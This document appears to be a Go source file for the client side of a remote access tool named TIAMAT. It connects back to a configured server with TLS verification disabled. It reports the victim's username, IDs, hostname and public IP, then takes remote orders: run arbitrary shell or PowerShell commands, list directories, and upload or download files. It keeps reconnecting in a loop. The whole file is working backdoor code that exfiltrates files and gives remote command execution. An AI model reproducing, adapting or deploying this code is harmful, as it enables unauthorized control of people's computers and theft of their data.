287 lines
6.1 KiB
Go
287 lines
6.1 KiB
Go
package main
|
|
|
|
import (
|
|
"crypto/tls"
|
|
"encoding/gob"
|
|
"fmt"
|
|
"io"
|
|
"log"
|
|
"net"
|
|
"net/http"
|
|
"os"
|
|
"os/exec"
|
|
"os/user"
|
|
"runtime"
|
|
"strings"
|
|
"time"
|
|
)
|
|
|
|
var (
|
|
// CONFIGURATION VALUES
|
|
RemoteIP string = "127.0.0.1"
|
|
RemotePort string = "1302"
|
|
Remote_IP_Requester string = "https://ip.bulgariu.xyz"
|
|
retryRate time.Duration = 5
|
|
useTLS bool = true
|
|
)
|
|
|
|
func main() {
|
|
log.SetPrefix("[TIAMAT-CLIENT] ")
|
|
for _, v := range os.Args {
|
|
if v == "--insecure" {
|
|
useTLS = false
|
|
}
|
|
}
|
|
|
|
for {
|
|
if err := start(); err != nil {
|
|
log.Print(err)
|
|
}
|
|
time.Sleep(time.Second * retryRate)
|
|
}
|
|
}
|
|
|
|
func startSecureConnection() (net.Conn, error) {
|
|
conf := &tls.Config{
|
|
InsecureSkipVerify: true,
|
|
}
|
|
conn, err := tls.Dial("tcp", RemoteIP+":"+RemotePort, conf)
|
|
return conn, err
|
|
}
|
|
|
|
func startInsecureConnection() (net.Conn, error) {
|
|
conn, err := net.Dial("tcp", RemoteIP+":"+RemotePort)
|
|
return conn, err
|
|
}
|
|
|
|
func start() error {
|
|
var conn net.Conn
|
|
var err error
|
|
if useTLS != true {
|
|
log.Println("WARNING: Starting unencrypted connection!")
|
|
conn, err = startInsecureConnection()
|
|
} else {
|
|
conn, err = startSecureConnection()
|
|
}
|
|
|
|
if err != nil {
|
|
e := fmt.Errorf("Error happened connecting to server: %v\n", err)
|
|
return e
|
|
}
|
|
defer conn.Close()
|
|
localIP := fmt.Sprint(conn.LocalAddr().(*net.TCPAddr).IP)
|
|
if err := sendOSInfo(conn, localIP); err != nil {
|
|
return err
|
|
}
|
|
for {
|
|
if err := awaitInstructions(conn); err != nil {
|
|
e := fmt.Errorf("Error happened awaiting instructions: %v\n", err)
|
|
return e
|
|
}
|
|
}
|
|
}
|
|
|
|
func getIP() (string, error) {
|
|
res, err := http.Get(Remote_IP_Requester)
|
|
if err != nil {
|
|
log.Printf("Error happened GETting IP: %v\n", err)
|
|
return "", nil
|
|
}
|
|
resbody, err := io.ReadAll(res.Body)
|
|
if err != nil {
|
|
log.Printf("Error happened reading IP body: %v\n", err)
|
|
return "", nil
|
|
}
|
|
ip := strings.TrimRight(string(resbody), "\n")
|
|
return ip, nil
|
|
}
|
|
|
|
func sendOSInfo(conn net.Conn, localIP string) error {
|
|
currentUser, err := user.Current()
|
|
if err != nil {
|
|
e := fmt.Errorf("Error happened getting user: %v\n", err)
|
|
return e
|
|
}
|
|
|
|
clientHostname, err := os.Hostname()
|
|
if err != nil {
|
|
e := fmt.Errorf("Error happened getting hostname: %v\n", err)
|
|
return e
|
|
}
|
|
|
|
ip, err := getIP()
|
|
if err != nil {
|
|
e := fmt.Errorf("Error happened pulling IP: %v\n", err)
|
|
return e
|
|
}
|
|
|
|
newClient := Client{
|
|
Username: currentUser.Username,
|
|
UID: currentUser.Uid,
|
|
GID: currentUser.Gid,
|
|
OperatingSystem: runtime.GOOS,
|
|
Hostname: clientHostname,
|
|
PublicIP: ip,
|
|
LocalIP: localIP,
|
|
}
|
|
|
|
enc := gob.NewEncoder(conn)
|
|
err = enc.Encode(newClient)
|
|
if err != nil {
|
|
e := fmt.Errorf("Error happened sending OS info to server: %v\n", err)
|
|
return e
|
|
}
|
|
|
|
return nil
|
|
}
|
|
|
|
func awaitInstructions(conn net.Conn) error {
|
|
dec := gob.NewDecoder(conn)
|
|
inst := Instructions{}
|
|
err := dec.Decode(&inst)
|
|
if err != nil {
|
|
return err
|
|
}
|
|
|
|
switch {
|
|
///////////////////////////////
|
|
case inst.IsHeartbeat == true && inst.Message == "PING":
|
|
if err := Heartbeat(conn); err != nil {
|
|
return err
|
|
}
|
|
///////////////////////////////
|
|
case inst.IsCommand == true:
|
|
executeCommand(conn, inst.Message)
|
|
///////////////////////////////
|
|
case inst.IsKillswitch == true:
|
|
os.Exit(0)
|
|
///////////////////////////////
|
|
case inst.IsListFiles == true:
|
|
listFiles(conn, inst.Path)
|
|
///////////////////////////////
|
|
case inst.IsUpload == true:
|
|
receiveFile(conn, inst.FileName, inst.Path, inst.FileContents)
|
|
///////////////////////////////
|
|
case inst.IsDownload == true:
|
|
sendFile(conn, inst.Path)
|
|
///////////////////////////////
|
|
default:
|
|
sendMessage(Response{Successful: false, Message: "Unknown order!"}, conn)
|
|
}
|
|
///////////////////////////////
|
|
return nil
|
|
}
|
|
|
|
func sendFile(conn net.Conn, filepath string) {
|
|
f, err := os.Open(filepath)
|
|
if err != nil {
|
|
e := fmt.Sprint(err)
|
|
sendMessage(Response{Successful: false, Message: e}, conn)
|
|
return
|
|
}
|
|
s, _ := os.Stat(filepath)
|
|
contents, err := io.ReadAll(f)
|
|
if err != nil {
|
|
e := fmt.Sprint(err)
|
|
sendMessage(Response{Successful: false, Message: e}, conn)
|
|
return
|
|
}
|
|
sendMessage(Response{
|
|
Successful: true,
|
|
FileName: s.Name(),
|
|
FileContents: contents,
|
|
}, conn)
|
|
}
|
|
|
|
func receiveFile(conn net.Conn, filename string, filepath string, filecontents []byte) {
|
|
err := os.WriteFile(filepath+"/"+filename, filecontents, 0700)
|
|
if err != nil {
|
|
log.Println(err)
|
|
e := fmt.Sprint(err)
|
|
sendMessage(Response{Successful: false, Message: e}, conn)
|
|
return
|
|
}
|
|
|
|
sendMessage(Response{Successful: true}, conn)
|
|
}
|
|
|
|
func listFiles(conn net.Conn, rpath string) {
|
|
path := strings.TrimRight(rpath, "/") + "/"
|
|
if rpath == "/" {
|
|
path = "/"
|
|
}
|
|
list, err := os.ReadDir(path)
|
|
if err != nil {
|
|
e := fmt.Sprint(err)
|
|
sendMessage(Response{Successful: false, Message: e}, conn)
|
|
return
|
|
}
|
|
|
|
newList := FileList{}
|
|
for _, v := range list {
|
|
var isDir bool
|
|
|
|
f, err := os.Stat(path + v.Name())
|
|
if err != nil {
|
|
continue
|
|
}
|
|
if f.IsDir() == true {
|
|
isDir = true
|
|
}
|
|
item := Item{
|
|
Name: v.Name(),
|
|
FullPath: path + v.Name(),
|
|
IsFolder: isDir,
|
|
}
|
|
newList.File = append(newList.File, item)
|
|
}
|
|
sendMessage(Response{
|
|
Successful: true,
|
|
FileList: newList,
|
|
}, conn)
|
|
}
|
|
|
|
func Heartbeat(conn net.Conn) error {
|
|
resp := Response{Successful: true, Message: "PONG"}
|
|
err := sendMessage(resp, conn)
|
|
if err != nil {
|
|
return err
|
|
}
|
|
return nil
|
|
}
|
|
|
|
func executeCommand(conn net.Conn, command string) {
|
|
var out []byte
|
|
var err error
|
|
|
|
formattedCommand := strings.Fields(command)
|
|
switch runtime.GOOS {
|
|
case "windows":
|
|
t := []string{"-NoProfile"}
|
|
t = append(t, formattedCommand...)
|
|
out, err = exec.Command("powershell", t...).Output()
|
|
case "linux":
|
|
out, err = exec.Command(formattedCommand[0], formattedCommand[1:]...).Output()
|
|
}
|
|
if err != nil {
|
|
errorMsg := fmt.Sprintf("%v\n", err)
|
|
resp := Response{Successful: false, Message: errorMsg}
|
|
sendMessage(resp, conn)
|
|
return
|
|
}
|
|
resp := Response{
|
|
Successful: true,
|
|
Message: string(out),
|
|
}
|
|
sendMessage(resp, conn)
|
|
}
|
|
|
|
func sendMessage(resp Response, conn net.Conn) error {
|
|
enc := gob.NewEncoder(conn)
|
|
err := enc.Encode(&resp)
|
|
if err != nil {
|
|
return err
|
|
}
|
|
return nil
|
|
}
|